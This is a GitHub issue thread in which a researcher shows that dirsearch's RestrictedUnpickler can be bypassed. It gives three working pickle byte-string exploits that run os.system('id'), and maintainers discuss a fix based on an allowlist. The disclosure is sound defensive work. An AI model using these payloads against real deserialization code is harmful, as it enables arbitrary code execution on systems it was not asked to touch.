### ISSUE TITLE
`RestrictedUnpickler` is Bypassable

### ISSUE THREAD

**Issue by splitline** [maurosoria/dirsearch#1073]
### TL;DR
The implementation of `RestrictedUnpickler` in here is bypassable.
https://github.com/maurosoria/dirsearch/blob/24b7bc375a196de7e709edb0d16ed06fe198ef2e/lib/utils/common.py#L86-L99

### How to Bypass (PoC)

> Tested on Python 3.10, might work on other Python 3 versions too.

Basically, it allows 3 kinds of (module, name) combination:

1. `module` is one of the `ALLOWED_PICKLE_MODULES` 
2. `module` is `builtins`, and the name is not `exec` nor `eval` (`UNSAFE_PICKLE_BUILTINS`)
3. `module` is submodule of one of the `ALLOWED_PICKLE_MODULES` 

Then let's exploit these 3 conditions one by one,  and I'll try to generate the pickle bytecode using [my toy compiler](https://github.com/splitline/Pickora). Every exploit should execute code equivalent to `__import__('os').system('id')`.

**1. `module` is one of the `ALLOWED_PICKLE_MODULES`**

It allows 5 modules here:
https://github.com/maurosoria/dirsearch/blob/24b7bc375a196de7e709edb0d16ed06fe198ef2e/lib/core/settings.py#L41

And I found that the `collections` module has a cool gadget chain (other modules should have some gadgets too)

First, you can get `builtins` (in dict type) from `collections.__builtins__`, then you can use `collections._itemgetter` to get arbitrary attributes of `builtins`. So you have a `exec` or `eval` now, you can execute any python code.

PoC:
```
import io
from lib.utils.common import RestrictedUnpickler
RestrictedUnpickler(io.BytesIO(b'\x80\x04\x95r\x00\x00\x00\x00\x00\x00\x00(\x8c\x0bcollections\x8c\x0c__builtins__\x93\x94\x8c\x0bcollections\x8c\x0b_itemgetter\x93\x94h\x01\x8c\x04eval\x85R\x94h\x02\x94h\x03h\x00\x85R\x8c\x1d__import__("os").system("id")\x85R1N.')).load()
```

Bytecode is generated by:
```shell
python3 pickora.py -c "from collections import __builtins__
from collections import _itemgetter
get_eval = _itemgetter('eval')
get_eval(__builtins__)('__import__(\"os\").system(\"id\")')" 
```

**2. `module` is `builtins`, and the name is not `exec` nor `eval` (`UNSAFE_PICKLE_BUILTINS`)**

We can use `builtins.__import__` and `builtins.getattr` to import arbitrary dangerous functions.

PoC:
```python
import io
from lib.utils.common import RestrictedUnpickler
RestrictedUnpickler(io.BytesIO(b'\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x07getattr\x93\x8c\x08builtins\x8c\n__import__\x93\x8c\x02os\x85R\x8c\x06system\x86R\x8c\x02id\x85R1N.')).load()
```
Bytecode is generated by: `python pickora.py -c '__import__("os").system("id")'`.

**3. `module` is submodule of one of the `ALLOWED_PICKLE_MODULES`** 

`find_class` in pickle will recursively look up the `name`, so once we found a submodule imported a dangerous module (`os` in this case), then we can get the functions in that dangerous module. 

For example, a `os` module is imported in `lib.core.settings`:
https://github.com/maurosoria/dirsearch/blob/24b7bc375a196de7e709edb0d16ed06fe198ef2e/lib/core/settings.py#L19

PoC:
```
import io
from lib.utils.common import RestrictedUnpickler
RestrictedUnpickler(io.BytesIO(b"\x80\x04\x95'\x00\x00\x00\x00\x00\x00\x00(clib.core.settings\nos.system\n\x8c\x02id\x85R1N.")).load()
```

Bytecode is generated by: `python pickora.py -c "GLOBAL('lib.core.settings', 'os.system')('id')"`

### The Proper Way?

The correct way to restrict globals is restricting both `module` and `name` in `find_class` at the same time, just like what the [documet](https://docs.python.org/3/library/pickle.html#restricting-globals) do. And blacklist seems never a best practice to prevent vulnerabilities.

**Comment by shelld3v** [comment]
Hello @splitline, thanks a lot for reporting this, it's a really great and smart finding. I had thought about the `__import__` builtin before but wasn't be able to reproduce the behavior, now I can. So, you think we should make a whitelist of allowed `{module}.{name}`?

**Comment by splitline** [comment]
Hi @shelld3v, yes I think we should do that.
Python pickle is unreasonable(?) flexible, you can take it as a subset programming language of Python, which can import and call any function, also can reuse the return value of those functions.
